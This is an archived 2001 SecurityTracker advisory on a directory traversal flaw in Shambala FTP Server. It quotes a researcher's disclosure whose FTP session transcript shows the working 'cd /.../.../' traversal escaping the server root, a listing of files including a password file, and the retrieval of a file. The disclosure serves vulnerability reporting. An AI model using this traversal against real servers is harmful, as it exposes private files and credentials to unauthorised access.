SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Shambala Server Vendors:   Evolvable Corporation
Shambala FTP Server Gives Remote Users Access to Any Files on the FTP Server's Drive
SecurityTracker Alert ID:  1001698
SecurityTracker URL:  http://securitytracker.com/id/1001698
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 7 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Shambala FTP server that allows remote users to access files on the server located outside of the server's root directory.

A remote user can change to any directory and view files.

If a remote user sends the command "CWD ..." (or "cd ..." in the default FTP client), the server will change directories up to the higher level directory.

A transcript of a demonstration exploit scenario is provided in the Source Message.

Impact:   A remote user can traverse the directory tree on the target FTP server and obtain files on the server that are located outside of the FTP server's root document directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.evolvable.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Shambala FTP server Directory Traversal


This is a multi-part message in MIME format.
--------------33B0A33A1FE995217D8106E9
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


======================================================================


	        Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug  allows  any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=[Plataforms]=-----------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  d---------    owner    group          0   21-maj-01 17:50   1.xx.xx.xx
  ----------    owner    group        283   21-maj-01 17:55   
index-_-1_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-2_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-3_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-4_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-5_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-6_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-7_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-8_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-9_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-10_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-11_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-12_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-13_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-14_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-15_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_-16_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_0_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   
index-_0_0_-1.htm
  ----------    owner    group        283   21-maj-01 17:55   .htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-2.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-3.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-4.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-5.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-6.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-7.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-8.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-9.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-10.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_0_-12.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_0_-1_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_1_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   
index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group      15444   04-maj-01 14:26   SCAN.log
  ----------    owner    group     140340   04-maj-01 14:05   
MAILS-PRESIDENCIA.txt
  ----------    owner    group     466944   18-sep-99 09:32   Shambala.exe
  ----------    owner    group       3564   21-maj-01 17:48   ST6UNST.LOG
  ----------    owner    group         31   21-maj-01 17:50   
passwordsxxx.txt
  d---------    owner    group          0   21-maj-01 17:50   Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group     246928   18-jan-01 13:10   N6Setup.exe
  d---------    owner    group          0   18-jan-01 15:39   Netscape 6
  d---------    owner    group          0   18-jan-01 14:50   Netscape 6 
Setup
  ----------    owner    group    3209110   19-jan-01 10:51   getrgt.exe

.
.
.
.
.

  ----------    owner    group        168   21-maj-01 19:07   
raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files not compromise.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com







--------------33B0A33A1FE995217D8106E9--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC